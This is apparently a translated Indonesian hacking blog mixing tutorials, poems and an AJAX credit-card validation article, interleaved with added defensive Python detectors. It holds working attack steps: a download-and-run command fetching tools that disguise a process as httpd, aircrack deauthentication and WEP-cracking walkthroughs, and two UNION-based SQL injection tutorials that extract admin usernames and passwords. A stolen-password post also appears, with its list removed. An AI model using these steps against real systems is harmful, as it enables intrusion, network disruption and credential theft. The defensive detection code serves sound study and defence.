hehe.. anyone know what a proxy is??
A proxy disguises our IP as the IP of our shell, so we don't get hit so easily by DDoS, WinNukes and the like..
Here's how to build the proxy.. really easy..
1. log in to your shell
2. wget http://t.i.a.n.tripod.com/data/vie.tgz or, if that doesn't work, type curl -o vie.tgz http://t.i.a.n.tripod.com/data/vie.tgz
3. extract: tar -zxvf vie.tgz
4. cd pro
5. ./xh -s "/usr/sbin/httpd"
6. ./prox -a -d -pPORT (example: ./prox -a -d -p11069)
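Step 5 above renames the running process so that it shows up as /usr/sbin/httpd in a process listing. From the defender's side that is exactly the signal to look for: a process whose advertised name disagrees with the binary it was actually started from. The following check is an added example written for this page, not code from the post or from the tools it links; the process records are constructed, and read_proc_records() is only a Linux convenience for feeding it live data (reading other users' /proc/PID/exe links requires root).

```python
"""Flag processes whose advertised name does not match the binary that is running.
Added example: the sample records are constructed; read_proc_records() is a Linux helper."""
import os
from typing import Dict, List

# Locations from which a long-running "system daemon" has no business executing (assumption)
SUSPICIOUS_DIRS = ("/tmp/", "/dev/shm/", "/var/tmp/", "/home/")


def masquerade_reasons(rec: Dict) -> List[str]:
    """Return the reasons a record looks like it is lying about its identity.
    rec = {"pid": int, "comm": str, "exe": str, "cmdline": [argv0, ...]}"""
    reasons = []
    exe = rec["exe"]
    deleted = exe.endswith(" (deleted)")      # binary unlinked after exec, a classic trick
    if deleted:
        exe = exe[: -len(" (deleted)")]
    exe_base = os.path.basename(exe)
    argv0 = rec["cmdline"][0] if rec["cmdline"] else ""
    if argv0.startswith("/"):
        # absolute argv[0] that names a different file than the mapped executable
        if argv0 != exe:
            reasons.append(f"argv0 {argv0!r} != exe {exe!r}")
    elif argv0 and not exe_base.startswith(os.path.basename(argv0)):
        # relative argv[0] unrelated to the real binary name ("python3" vs "python3.10" is fine)
        reasons.append(f"argv0 basename {os.path.basename(argv0)!r} vs exe {exe_base!r}")
    if not exe_base.startswith(rec["comm"]):
        # comm (prctl PR_SET_NAME) should be the executable's basename, truncated to 15 chars
        reasons.append(f"comm {rec['comm']!r} vs exe {exe_base!r}")
    if exe.startswith(SUSPICIOUS_DIRS):
        reasons.append(f"exe in user-writable location {exe!r}")
    if deleted:
        reasons.append("executable deleted on disk")
    return reasons


def find_masquerading(procs: List[Dict]) -> Dict[int, List[str]]:
    """Map pid -> reasons for every record that triggers at least one rule."""
    return {p["pid"]: r for p in procs if (r := masquerade_reasons(p))}


def read_proc_records() -> List[Dict]:
    """Linux only: build records from /proc; skips processes that vanish or are unreadable."""
    recs = []
    for name in os.listdir("/proc"):
        if not name.isdigit():
            continue
        pid = int(name)
        try:
            with open(f"/proc/{pid}/comm") as f:
                comm = f.read().strip()
            exe = os.readlink(f"/proc/{pid}/exe")
            with open(f"/proc/{pid}/cmdline", "rb") as f:
                cmdline = [a.decode(errors="replace") for a in f.read().split(b"\0") if a]
        except OSError:
            continue
        recs.append({"pid": pid, "comm": comm, "exe": exe, "cmdline": cmdline})
    return recs


# Constructed sample: a real httpd, a normal interpreter, and two disguised processes
SAMPLE_PROCS = [
    {"pid": 800, "comm": "httpd", "exe": "/usr/sbin/httpd", "cmdline": ["/usr/sbin/httpd", "-k", "start"]},
    {"pid": 2001, "comm": "python3", "exe": "/usr/bin/python3.10", "cmdline": ["python3", "app.py"]},
    {"pid": 3117, "comm": "httpd", "exe": "/home/user/pro/prox", "cmdline": ["/usr/sbin/httpd"]},
    {"pid": 3118, "comm": "prox", "exe": "/home/user/pro/prox (deleted)", "cmdline": ["./prox", "-a", "-d", "-p11069"]},
]

if __name__ == "__main__":
    for pid, reasons in find_masquerading(SAMPLE_PROCS).items():
        print(pid, "->", "; ".join(reasons))
```

The exe link is the authoritative identity: `ps` prints argv[0] and comm, both of which a process can rewrite, while /proc/PID/exe resolves to the inode that was actually executed.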
Build Your Own Proxy
Posted in tuToRIaL on September 9, 2009 by ibnfahd
Wifi with BackTrack 3
Posted in hAckInG on August 28, 2009 by ibnfahd
BackTrack includes the aircrack tools for wifi hacking, and aircrack comes with a number of companions, among them aireplay-ng, airodump-ng, airmon-ng and so on.
This time I will explain the use of aireplay-ng:
a. Put the wireless device into monitor mode
airmon-ng <start|stop|check> <interface>
Explanation:
airmon-ng : puts the wireless device into monitor mode
start,stop,check : [enable, disable, check] which mode the wireless device is in
interface : the wireless device
Example: airmon-ng start wlan0
and the result:
Interface Chipset Driver
wlan0 Unknown iwlagn - [phy0]
(monitor mode enabled on mon0)
b. Kicking all clients off
aireplay-ng --deauth [count] -c FF:FF:FF:FF:FF:FF -a [AP MAC] wifi_device
Explanation:
--deauth : deauthenticates the station
count : the number of deauthentication rounds, i.e. how long the stations stay kicked off; once the entered count is used up, all clients become active again.
Example: aireplay-ng --deauth 10 -c FF:FF:FF:FF:FF:FF -a [AA:BB:CC:DD:EE:FF] mon0
c. Kicking a single client off
aireplay-ng --deauth [count] -c [client MAC] -a [AP MAC] wifi_device
Explanation:
--deauth : deauthenticates the station
count : the number of deauthentication rounds, i.e. how long the station stays kicked off; once the entered count is used up, the client becomes active again.
Example: aireplay-ng --deauth 10 -c A1:B2:C3:AF:DF:A4 -a [AA:BB:CC:DD:EE:FF] mon0
Sometimes the aireplay command above fails because the AP's channel is not the same as the wireless device's channel, so repeat the command until the AP's channel matches the channel of our wireless device.
http://indobacktrack.or.id/2009/06/hacking-wifi-di-backtrack-3/
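The commands above work because a deauthentication frame is an unauthenticated management frame that any station can forge, and a burst of them addressed to FF:FF:FF:FF:FF:FF drops every client at once. On the monitoring side that burst is easy to spot. The detector below is an added example written for this page, not code from the post or from the aircrack suite; the frame list is constructed (in practice it would come from a monitor-mode capture), and the one-second window and five-frame threshold are assumptions to tune per site.

```python
"""Detect 802.11 deauthentication / disassociation floods.
Added example: frames, window and threshold are constructed assumptions."""
from collections import defaultdict, deque
from typing import Iterable, List, Tuple

DEAUTH = 0x0C      # management frame subtype 12
DISASSOC = 0x0A    # management frame subtype 10
BROADCAST = "ff:ff:ff:ff:ff:ff"

Frame = Tuple[float, int, str, str]   # (timestamp_s, subtype, bssid, destination)


def detect_deauth_flood(frames: Iterable[Frame], window: float = 1.0, threshold: int = 5) -> List[dict]:
    """Raise one alert per BSSID each time >= threshold deauth/disassoc frames
    are seen within `window` seconds. After an alert fires for a BSSID, further
    alerts for it are suppressed for one window, so a 10-frame burst yields one alert."""
    recent = defaultdict(deque)          # bssid -> deque of (ts, dst) inside the window
    last_alert = {}
    alerts = []
    for ts, subtype, bssid, dst in sorted(frames):
        if subtype not in (DEAUTH, DISASSOC):
            continue
        q = recent[bssid]
        q.append((ts, dst))
        while q and ts - q[0][0] > window:
            q.popleft()                  # slide the window
        if len(q) >= threshold and ts - last_alert.get(bssid, float("-inf")) > window:
            alerts.append({
                "ts": ts,
                "bssid": bssid,
                "count": len(q),
                # broadcast destination == the "kick everyone" form of the command
                "broadcast": any(d == BROADCAST for _, d in q),
                "targets": sorted({d for _, d in q if d != BROADCAST}),
            })
            last_alert[bssid] = ts
    return alerts


# Constructed sample: a 10-frame broadcast deauth burst spoofing one AP address,
# one data frame (subtype 0x20) in the middle, and a single legitimate deauth later.
SAMPLE_FRAMES: List[Frame] = (
    [(round(0.1 * i, 1), DEAUTH, "aa:bb:cc:dd:ee:ff", BROADCAST) for i in range(10)]
    + [(0.35, 0x20, "aa:bb:cc:dd:ee:ff", "a1:b2:c3:af:df:a4")]
    + [(5.0, DEAUTH, "00:11:22:33:44:55", "a1:b2:c3:af:df:a4")]
)

if __name__ == "__main__":
    for alert in detect_deauth_flood(SAMPLE_FRAMES):
        print(alert)
```

A single legitimate deauth (an AP dropping an idle client) never reaches the threshold, while the flood triggers on its fifth frame. The mitigation that removes the attack rather than just detecting it is 802.11w Protected Management Frames, under which clients discard deauthentication frames that are not integrity-protected.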
WEAKNESS OF THE "WEP" SECURITY SYSTEM
Posted in tuToRIaL on August 28, 2009 by ibnfahd
THIS ARTICLE DEMONSTRATES THE WEAKNESS OF "WEP", WHICH IS HIGHLY VULNERABLE TO BEING HACKED; THE TARGET IS ONLY AN AP OF MY OWN
====================================================================================
BACK TRACK BACK TRACK BACK TRACK — card eth1
====================================================================================
1. wifi setup
============================
console 1
============================
airmon-ng stop eth1
airmon-ng start wifi0
2. check the AP signals
============================
console 1
============================
airodump-ng eth1
============================
target
============================
SSID : NETGEAR2
CHANNEL : 1
MAC AP (BSSID) : 00:90:4C:7E:00:10
MAC CLIENT-AP : 00:08:9F:F1:07:2B
3. capturing ivs
a. capturing ivs
============================
console 2
============================
airodump-ng --channel 1 --bssid 00:90:4C:7E:00:10 -w hasil eth1
b. flooding arp packets
==============
[console 3]
==============
aireplay-ng --arpreplay -b 00:90:4C:7E:00:10 -h 00:08:9F:F1:07:2B eth1
c. perform deauthentication
==============
[console 4]
==============
aireplay-ng --deauth 5 -c 00:08:9F:F1:07:2B -a 00:90:4C:7E:00:10 eth1
4. process the captured ivs (ivs = 25000)
aircrack-ng hasil*.cap
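The walkthrough above collects IVs because WEP seeds RC4 with a 24-bit IV prepended to the shared key, so a busy AP repeats IVs within hours and two frames under the same IV share a keystream. The snippet below is an added example written for this page, not code from the post or from aircrack-ng: it implements plain RC4, WEP-style per-packet seeding (the CRC-32 ICV is omitted), and shows that XORing two same-IV ciphertexts cancels the keystream, which is why predictable ARP traffic is so useful to an attacker and why WPA2/WPA3 replaced this design. Key, IV and packet contents are constructed.

```python
"""Why IV reuse breaks WEP: same IV + same key => same RC4 keystream.
Added example with a constructed 40-bit key, IV and packets; no ICV."""
import math
from typing import Iterator


def rc4_keystream(key: bytes) -> Iterator[int]:
    """Plain RC4: key-scheduling algorithm, then the pseudo-random generation loop."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    i = j = 0
    while True:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        yield S[(S[i] + S[j]) & 0xFF]


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """WEP-style framing: the 3-byte IV travels in the clear in front of the body,
    and the per-packet RC4 seed is IV || shared key."""
    if len(iv) != 3:
        raise ValueError("WEP IVs are 24 bits")
    ks = rc4_keystream(iv + key)
    return iv + bytes(p ^ next(ks) for p in plaintext)


def recover_with_known_plaintext(c1: bytes, c2: bytes, p1: bytes) -> bytes:
    """If c1 and c2 carry the same IV then c1 ^ c2 == p1 ^ p2, so a known p1
    (an ARP body, say) reveals p2 without ever learning the key."""
    if c1[:3] != c2[:3]:
        raise ValueError("different IVs: the keystreams differ, nothing cancels")
    n = min(len(c1), len(c2), len(p1) + 3)
    return bytes(a ^ b ^ p for a, b, p in zip(c1[3:n], c2[3:n], p1))


def iv_collision_probability(packets: int, iv_bits: int = 24) -> float:
    """Birthday bound: probability that at least one IV repeats among `packets` frames."""
    pairs = packets * (packets - 1) / 2
    return 1.0 - math.exp(-pairs / 2 ** iv_bits)


KEY = bytes.fromhex("0102030405")                 # constructed 40-bit WEP key
IV = bytes.fromhex("a1b2c3")                      # constructed IV the AP happens to reuse
PACKET_1 = b"ARP request: who has 192.0.2.1?"    # constructed; assumed known to the observer
PACKET_2 = b"SECRET message to the gateway..."   # constructed; the frame being recovered


def demo() -> bytes:
    """Encrypt two frames under one IV and recover the second from the first."""
    c1 = wep_encrypt(KEY, IV, PACKET_1)
    c2 = wep_encrypt(KEY, IV, PACKET_2)
    return recover_with_known_plaintext(c1, c2, PACKET_1)


if __name__ == "__main__":
    print(demo())
    print(f"P(IV reuse after 5000 frames) = {iv_collision_probability(5000):.2f}")
```

The birthday figure explains the "ivs = 25000" target in step 4: with only 2^24 IVs, reuse is likely after a few thousand frames, and the statistical key-recovery attacks need on the order of tens of thousands of distinct IVs. Nothing in this construction is repaired by a longer key; the per-packet key derivation and integrity protection of WPA2 (CCMP) are the fix.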
Validate Credit Card Numbers
Posted in tuToRIaL on July 25, 2008 by ibnfahd
Entering a credit card number on a web page has become commonplace. This hack verifies the entered credit card number, then submits it to the server component only if the number is valid. Nothing else changes on the page except for a user message, which notifies the user of any error conditions or that the credit card has passed muster and has been sent to the server to be processed. (Although we won’t discuss them here, as in “Validate Email Syntax”, the server component then implements its own credit card validation routines.)
The server connection will likely be initiated over Secure Sockets Layer (SSL), such as with the HTTPS protocol, and be involved with an e-commerce component that further verifies the purchase information with a merchant bank. This hack, however, just verifies the number, generates a message, and makes an HTTP request using Ajax techniques.
Enter a credit card number for verification
This is the web page code. It imports two JavaScript files, http_request.js and cc.js:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<script type="text/javascript" src="js/http_request.js"></script>
<script type="text/javascript" src="js/cc.js"></script>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1" />
<title>Enter credit card number</title>
</head>
<body>
<h3>Please enter your payment information</h3>
<div id="message"></div>
<p>
[Name and billing address appear here]
</p>
<p>
Credit card type:
</p>
<form action="javascript:void%200">
<p>
<select name="cctype">
<option value="Choose one...">Choose one...</option>
<option value="Mastercard">Mastercard</option>
<option value="Visa">Visa</option>
<option value="American Express">American Express</option>
<option value="Discover">Discover</option>
</select>
</p>
<p>
Credit card number (#### #### #### #### or no spaces):
<input type="text" name="cc" size="16" maxlength="19" />
</p>
<p>Expiration date:
<select name="exp_month">
<option>January</option>
<option>February</option>
<option>March</option>
<!-- etc... -->
</select>
<select name="exp_year">
<option>2005</option>
<option>2006</option>
<option>2007</option>
<!-- etc... -->
</select>
</p>
<p>
Card Security code:
<input type="text" name="scode" size="4" maxlength="4" />
</p>
<p>
<button type="submit" name="submit" value="Submit">Submit</button>
</p>
</form>
</body>
</html>
The user chooses a credit card type (e.g., “Mastercard”); enters the card number, expiration date, and card security code (CSC); and clicks the Submit button. However, instead of having the page dissolve and the values depart immediately for the server, the application verifies a few conditions first. The JavaScript makes sure that the fields are not blank and contain the required minimum number of characters (such as three for the CSC), and then it verifies the card number using the Luhn formula or algorithm.
The Luhn formula is a well-known algorithm used to verify ID numbers like credit card numbers. See http://en.wikipedia.org/wiki/Luhn_formula for details.
If one of these checks fails, the hack displays an error message in red. The figure shows one of these messages.
Time to reenter the credit card number
If the credit card number is verified and everything else has been correctly entered, the hack uses XMLHttpRequest to send this information to a server.
We are not strictly making a secure connection in this hack, but a real application would not send any purchase information unencrypted over a network. In addition, it is worth mentioning a second time that the main job of validating a credit card rests with the processing server component(s).
A message in blue notifies the user that the organization is processing the credit card.
Verifying the Card Number
cc.js contains the code for responding to the user’s button click, as well as for verifying the information and generating a user message. http_request.js (see “Use Your Own Library for XMLHttpRequest”) creates and calls the methods of XMLHttpRequest. Here is the code contained in cc.js:
var finalCnumber;
window.onload=function( ){
document.forms[0].onsubmit=function( ){
verify(this.cc.value,this.scode.value,this.cctype.value,
this.exp_month.value+" "+this.exp_year.value);
return false;
};
}
//credit card number, security code, credit card type, and expiration date
function verify(ccard,secure_code,cctype,ccexp){
if(secure_code.length < 3) {
eMsg("Please enter a valid value for the security code.","red");
return;}
if(cctype=="Choose one...") {
eMsg("Please enter a valid value for the credit card type.","red");
return;}
if (! clientsideVerify(ccard)) {
eMsg("Please enter a valid value for the credit card.","red");}
else{
eMsg("Please wait while we process the credit card.","blue");
ccard=remDashSpace(ccard);
var url="http://www.parkerriver.com/s/verify?cc="+
encodeURIComponent(ccard)+"&scode="+
encodeURIComponent(secure_code)+"&type="+
encodeURIComponent(cctype)+"&exp="+
encodeURIComponent(ccexp);
httpRequest("GET",url,true,handleCheck);
}
}
/* Check whether the credit card entry is null, is not lengthy enough,
or contains any letters. Remove any dashes or spaces from the entry,
then run the Luhn algorithm on the resulting number. */
function clientsideVerify(ccVal){
if(ccVal == null || ccVal.length < 13 ||
ccVal.search(/[a-zA-Z]+/) != -1){ return false; }
ccVal=remDashSpace(ccVal);
return (applyLuhn(ccVal) % 10) == 0;
}
//http://en.wikipedia.org/wiki/Luhn_formula
function applyLuhn(cc){
//reverse the String
var rev = reverse(cc);
//get array of character Strings
var revArr = rev.split("");
var total = 0;
var tmp = 0;
//add up the numbers
for(var i = 0; i < revArr.length; i++){
if((i % 2) > 0){
//every second digit from the right is doubled; a two-digit result
//has its digits added together, which is the same as subtracting 9
tmp = revArr[i]*2;
tmp = (tmp > 9 ? (tmp - 9) : tmp);
total += tmp;
} else {
total += Number(revArr[i]);
}
}//end for
return total;
}
//event handler for XMLHttpRequest; "request" is the XMLHttpRequest
//object created by http_request.js
function handleCheck( ){
var sTag,answer,xmlReturnVal;
if(request.readyState == 4){
if(request.status == 200){
//implement Document object in DOM
xmlReturnVal = request.responseXML;
sTag = xmlReturnVal.getElementsByTagName("cc_status")[0];
answer= sTag.childNodes[0].data;
if(answer=="okay"){
eMsg("Your purchase information has"+
" been submitted to our online store.","blue"); }
else {
eMsg("There was a problem with processing "+
"the credit card.","red"); }
} else {
alert("A problem occurred with communicating "+
"between the XMLHttpRequest object and the server program.");
}
}//end outer if
}
/* Utility functions:
reverse a string. */
function reverse(str){
var sArray = str.split("");
var newS="";
for(var i = sArray.length-1; i >= 0; i--){
newS += sArray[i];
}
return newS;
}
//generate a styled message
function eMsg(msg,sColor){
var div = document.getElementById("message");
div.style.color=sColor;
div.style.fontSize="0.9em";
//remove old messages
if(div.hasChildNodes( )){
div.removeChild(div.firstChild);
}
div.appendChild(document.createTextNode(msg));
}
//remove dashes or spaces; replace() returns a new string, so chain
//the two calls and return the stripped result
function remDashSpace(_number){
var number = _number.replace(/-/g,"");
number = number.replace(/ /g,"");
return number;
}
There is a lot of functionality to absorb here, so first we will discuss the button click. When the browser completes loading the web page, this event is captured by the code window.onload. This event handler is a sensible place to set up other event handlers, because the browser is guaranteed to have finished loading any other HTML tags that might be used by these handlers. Next, the code sets up an event handler for when the user submits the form:
document.forms[0].onsubmit=function( ){
verify(this.cc.value,this.scode.value,this.cctype.value,
this.exp_month.value+" "+this.exp_year.value);
return false;
};
The form’s onsubmit event handler points to a function that calls verify( ), then returns false, which effectively cancels the browser’s form submission. We are using the request object to send the form values only after verifying that the submissions are valid. Let’s look at the verify( ) function:
function verify(ccard,secure_code,cctype,ccexp){
if(secure_code.length < 3) {
eMsg("Please enter a valid value for the security code.","red");
return;}
if(cctype=="Choose one...") {
eMsg("Please enter a valid value for the credit card type.","red");
return;}
if (! clientsideVerify(ccard)) {
eMsg("Please enter a valid value for the credit card.","red");}
else {
eMsg("Please wait while we process the credit card.","blue");
ccard=remDashSpace(ccard);
var url="http://www.parkerriver.com/s/verify?cc="+
encodeURIComponent(ccard)+"&scode="+
encodeURIComponent(secure_code)+"&type="+
encodeURIComponent(cctype)+"&exp="+
encodeURIComponent(ccexp);
httpRequest("GET",url,true,handleCheck);
}
}
This function includes a number of common-sense checks before it validates the credit card number using another function, clientsideVerify( ). If the latter function returns true, the code builds a URL for the server component and then uses XMLHttpRequest to send the card information.
The httpRequest( ) function is responsible for setting up XMLHttpRequest and connecting with the server. Again, this function takes four parameters:
- The type of request, as in GET or POST
- The URL or server web address
- A Boolean indicating whether the request is asynchronous or not
- The name of a function or a function literal that handles the server response
The function name should be passed in without the following parentheses, as in handleCheck. It can also be a function literal, as in
httpRequest("GET",url,true,function( ){ //...});
The httpRequest( ) code appears in the file http_request.js (see “Use Your Own Library for XMLHttpRequest”).
Shooting the Luhn
The clientsideVerify( ) function verifies that the credit card number is at least 13 characters long and does not contain any letters. If the credit card number passes these checks, the code removes any spaces or dashes from the string and calls a function that uses the Luhn formula:
function clientsideVerify(ccVal){
if(ccVal == null || ccVal.length < 13 ||
ccVal.search(/[a-zA-Z]+/) != -1){ return false; }
ccVal=remDashSpace(ccVal);
return (applyLuhn(ccVal) % 10) == 0;
}
Here is the code for the applyLuhn( ) function:
function applyLuhn(cc){
//reverse the String
var rev = reverse(cc);
//get array of character Strings
var revArr = rev.split("");
var total = 0;
var tmp = 0;
//add up the numbers
for(var i = 0; i < revArr.length; i++){
if((i % 2) > 0){
tmp = revArr[i]*2;
tmp= (tmp < 9 ? tmp : (tmp - 9) );
total += tmp;
} else {
total += Number(revArr[i]);
}
}//end for
return total;
}
Information on the Luhn formula or algorithm is easily found on the Web, so we will not take up a lot of space describing it here.
This function takes a string of numbers, applies the formula to the numbers, and returns the sum to clientsideVerify( ). If the total can be evenly divided by 10, the credit card number is valid. Here is the piece of code from clientsideVerify( ) that makes this determination:
return (applyLuhn(ccVal) % 10) == 0;//returns true or false
The server component returns a bit of XML indicating success or failure, mimicking the processing of a purchase order (as in <cc_status>okay</cc_status>). The handleCheck( ) function generates a user message from this return value:
xmlReturnVal = request.responseXML;
sTag = xmlReturnVal.getElementsByTagName("cc_status")[0];
answer= sTag.childNodes[0].data;
if(answer=="okay"){
eMsg("Your purchase information has"+
" been submitted to our online store.","blue"); }
The eMsg( ) function is responsible for generating a styled user message in red, in the event of an error in handling the purchase information, or in blue otherwise. However, the entire process takes place backstage; the web page never refreshes, and only small parts of the user interface change as the user interacts with the application.
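The client-side checks above are a convenience for the user, not a security control: anything JavaScript does in the browser can be skipped by posting directly to the verify URL, which is why the text insists the server re-validates. The following is an added example written for this page, not code from the book or the blog: a Python version of the Luhn check suitable for that server side, with the input cleanup made strict (only ASCII digits survive normalization and the length is bounded to 13-19) and the doubling rule written as "subtract 9 when the doubled digit exceeds 9". The sample numbers are constructed test values.

```python
"""Luhn validation for a server-side check. Added example; sample numbers are constructed."""
import re
from typing import Optional

_SEPARATORS = re.compile(r"[ -]")


def normalize(number: str) -> Optional[str]:
    """Strip spaces and dashes; return None unless the rest is 13-19 ASCII digits.
    str.isdigit() alone would accept non-ASCII digit characters, hence the isascii() test."""
    digits = _SEPARATORS.sub("", number or "")
    if not digits.isascii() or not digits.isdigit() or not 13 <= len(digits) <= 19:
        return None
    return digits


def luhn_sum(digits: str) -> int:
    """Luhn sum: from the right, double every second digit and add the digits of
    any two-digit result (equivalently subtract 9), then add everything up."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = ord(ch) - ord("0")
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total


def luhn_valid(number: str) -> bool:
    """True when the number normalizes cleanly and its Luhn sum is a multiple of 10."""
    digits = normalize(number)
    return digits is not None and luhn_sum(digits) % 10 == 0


def luhn_check_digit(partial: str) -> str:
    """Check digit that makes partial + digit Luhn-valid (how issuers assign the last digit)."""
    return str((10 - luhn_sum(partial + "0") % 10) % 10)


if __name__ == "__main__":
    for sample in ("4111 1111 1111 1111", "4111-1111-1111-1112", "4111 1111 1111 111a"):
        print(f"{sample!r}: {'valid' if luhn_valid(sample) else 'invalid'}")
```

A passing Luhn check only rules out single-digit typos and most adjacent transpositions; it says nothing about whether the card exists, is active, or belongs to the buyer, so the authorization step with the processor remains the real validation.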
password friendster
Posted in hAckInG on July 10, 2008 by ibnfahd
if you want to mess around, please don't change the friendster passwords
[list of e-mail addresses and passwords removed]
Song of the Evening Dew
Posted in kUmpULan PuISi on June 30, 2008 by ibnfahd
Until at last
I
stinging pain
will not strike me down
my resolve
you ask
steadfastness of heart
my answer
no doubt
keep heading on
cruel sword
slashes my chest
drops of truth
become one with the earth
return as pure
will go home
dusk is calling
and the green of leaves
drips with dew
my work
pasuruan, june 2008
created by fizdan@yahoo.com
Creating multiple IDs in YM
Posted in tuToRIaL on June 26, 2008 by ibnfahd
It started with a friend's question while chatting on YM about how to create more than one ID in YM and….
ah, never mind, I've run out of words. Straight to it
1. open YM (Yahoo Messenger)
2. click the Messenger menu tab
3. then click My Profiles
4. click Create/edit Profiles
5. Create New Public Profile
6. then……….well, carry on by yourself,
create a new ID
7. done creating the ID, but why can't it be used yet?
add the ID you just created first, the same way you add a friend.
8. then sign out and sign in again with the ID you just created.
that's all there is to it…… thanks to Bang IndoUnderground who always guides me, and Bang xshadow who always answers my questions even though sometimes….. hehehehe….;))
Reflection
Posted in kUmpULan PuISi on June 25, 2008 by ibnfahd
life is never free of fate
in reality
everything has been written
within each living creature
but why are humans never grateful
even though
they have been given life
they have been given breath
and their death has been decreed
yet that is what life truly is.
created by bLoSsoM_
Lament
Posted in kUmpULan PuISi on June 25, 2008 by ibnfahd
empty hands
remembering, forgetting
not knowing what I want
life feels denied
it has already happened
how to face it
depends on the heart
control the emotions
and know yourself
always remember the divine
the Creator of
this heart
created by AnakinCasper
sql injection
Posted in tuToRIaL on June 25, 2008 by ibnfahd
1.) Checking for the bug
Suppose we have a target
http://www.target.com/news.php?id=5
Now we test whether the website has the bug by adding ' to the url
example http://www.target.com/news.php?id=5'
then this error will appear
“You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc…”
or something close to it
That means we can use SQL Injection
2). Finding the number of columns
To find the number of columns we use the ORDER BY command
We increment the number until there is an error
http://www.target.com/news.php?id=5+order+by+1/* <– no error
http://www.target.com/news.php?id=5+order+by+2/* <– no error
http://www.target.com/news.php?id=5+order+by+3/* <– no error
http://www.target.com/news.php?id=5+order+by+4/* <– error (we will get a message like Unknown column ‘4′ in ‘order clause’ or something like that… that's how it goes :) )
So we have the column count: it is 3, because at 4 it errors.
A little explanation: with ORDER BY we look for the point where the website switches from no error to error; once we find it, we take the last value that did not error before the error appears.
3). Using the UNION function
With UNION we can select more data in one sql statement.
So we get
http://www.target.com/news.php?id=5+UNION+SELECT+1,2,3/* (we found in part 2 that the number of columns is 3)
Now look at the article: it will change to the number 1 or 2 or 3, or all of them will appear; that is what UNION is for
4). Checking the MySQL version
http://www.target.com/news.php?id=5+union+select+1,2,3/*
NOTE: if /* does not work or causes an error, try --
this is an important comment for our query to work properly.
Suppose we get the number 2 in the display; now we check the version
we drop the number 2 and replace it with version() or @@version, and we will get something like 4.1.33-log or 5.0.45 or close to it.
Example: http://www.target.com/news.php?id=5+union+select+1,@@version,3/*
If you get the error “union + illegal mix of collations (IMPLICIT + COERCIBLE) …”
what we need is the convert() function
example:
http://www.target.com/news.php?id=5+union+select+1,convert(@@version+using+latin1),3/*
or with hex() and unhex()
example:
http://www.target.com/news.php?id=5+union+all+select+1,unhex(hex(@@version)),3/*
and you will get the MySQL version :D
5). Getting the table and column names
If the MySQL version is < 5 (example: 4.1.33, 4.1.12…) <— later I will explain MySQL > 5 versions.
we have to guess the table and column names.
for table names: user/s, admin/s, member/s …
for column names: username, user, usr, user_name, password, pass, passwd, pwd etc…
for example
http://www.target.com/news.php?id=5+union+all+select+1,2,3+from+admin/* (if we see the number two in the display, that table is correct)
we know the table is admin…
now we check the column name.
http://www.target.com/news.php?id=5+union+all+select+1,username,3+from+admin/* (if it errors, try another column name)
we get the username in the display, for example admin or superadmin etc…
now we check whether the password column exists
http://www.target.com/news.php?id=5+union+all+select+1,password,3+from+admin/* (if you get an error, try another column name)
we see the password in the display as a hash or as plain-text; that depends on the contents of the database
e.g. md5 hash, mysql hash, sha1…
now we have to finish the query so it looks nice :)
for that we use the concat() function (it joins strings)
example:
http://www.target.com/news.php?id=5+union+all+select+1,concat(username,0x3a,password),3+from+admin/*
note: 0x3a is the hex value 3a, and the 0x prefix is what lets the URL carry it
(there is another way, using char(58), which is the decimal value)
http://www.target.com/news.php?id=5+union+all+select+1,concat(username,char(58),password),3+from+admin/*
URL encode at
http://andi.lp3i.net/tools/asci.htm
now we get username:password in the display, e.g. admin:admin or admin:somehash
if you get that, you can log in as admin or superuser :D
if you cannot guess the table name, you can always try mysql.user (default)
its columns are user and password, so for example
http://www.target.com/news.php?id=5+union+all+select+1,concat(user,0x3a,password),3+from+mysql.user/*
That's enough for this part; now we move on to the hard part
created by http://indounderground.wordpress.com
Classic SQL Injection Tutorial
Posted in tuToRIaL on June 25, 2008 by ibnfahd
————————————————
Classic SQL Injection Tutorial
————————————————
First of all check for vulnerability.
http://www.example.com/news.php?id=1
Now, to test whether it is vulnerable, we add ' (a quote) to the end of the url, which gives http://example.com/news.php?id=1'
So if we get an error on that page like this:
“You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc…”
or something similar
that means it is vulnerable to sql injection
Now we need to find the number of columns
To find the number of columns we use the order by statement (it tells the database how to order the result)
Well, let's just increment the number until we get an error.
http://www.example.com/news.php?id=1 order by 1/* <– no error
http://www.example.com/news.php?id=1 order by 2/* <– no error
http://www.example.com/news.php?id=1 order by 3/* <– no error
http://www.example.com/news.php?id=1 order by 4/* <– error (we get a message like Unknown column ‘4′ in ‘order clause’ or something like that)
That means it has 3 columns, because we got an error on 4.
Now let's check the union function
What can we do with Union?
With union we can select more data in one sql statement.
So let's start
http://www.example.com/news.php?id=1 union all select 1,2,3/* (we already found the number of columns)
So if you see some numbers on the screen, e.g. 1 or 2 or 3, then congratz coz the Union works
Now we need to check for the MySQL version
Let's do it fast baby
http://www.example.com/news.php?id=1 union all select 1,2,3/* NOTE: if /* doesn't work or you get some error, then try with --
it's important for our query to work properly.
People, let's say that we have a number on the screen; now we need to check for the MySQL version.
Let's do it.
Now we need to replace one of the displayed numbers with @@version or version() to get something like 4.1.33-log or 5.0.45 or similar.
so it should look like this http://www.example.com/news.php?id=1 union all select 1,@@version,3/*
So, if you get an error like this “union + illegal mix of collations (IMPLICIT + COERCIBLE) …”
then we need the convert() function
okey let's try
http://www.example.com/news.php?id=1 union all select 1,convert(@@version using latin1),3/*
Or let's try with hex() and unhex()
http://www.example.com/news.php?id=1 union all select 1,unhex(hex(@@version)),3/*
and then people, we will get the MySQL Version yaaa ..
Now we need to get the table and the column name.
So if the MySQL version is, for example, 4.1.33, 4.1.12…
we must guess the table and column name in most cases.
Common table names are: user/s, admin/s, member/s …….
